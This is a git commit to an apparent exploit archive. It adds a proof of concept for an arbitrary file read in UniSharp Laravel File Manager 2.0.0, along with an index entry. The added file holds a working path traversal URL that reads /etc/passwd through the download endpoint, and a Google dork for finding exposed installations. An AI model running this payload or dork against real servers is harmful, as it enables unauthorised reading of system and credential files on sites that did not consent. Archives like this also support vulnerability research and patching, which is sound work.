DB: 2020-03-05

1 changes to exploits/shellcodes UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
2020-03-05 05:01:47 +00:00 · 2020-03-05 05:01:47 +00:00 · fce46f25ae
commit fce46f25ae
parent d85ad29bbc
2 changed files with 14 additions and 0 deletions
--- a/exploits/php/webapps/48166.txt
+++ b/exploits/php/webapps/48166.txt
@ -0,0 +1,13 @@
+# Exploit Title: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
+# Google Dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+# Date: 2020-02-04
+# Exploit Author: NgoAnhDuc
+# Vendor Homepage: https://github.com/UniSharp/laravel-filemanager
+# Software Link: https://github.com/UniSharp/laravel-filemanager
+# Version: v2.0.0-alpha8 & v2.0.0
+# Tested on: v2.0.0-alpha8 & v2.0.0
+# CVE : N/A
+
+PoC:
+
+http://localhost/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -42431,3 +42431,4 @@ id,file,description,date,author,type,platform,port
 48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
 48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
 48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,
+48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,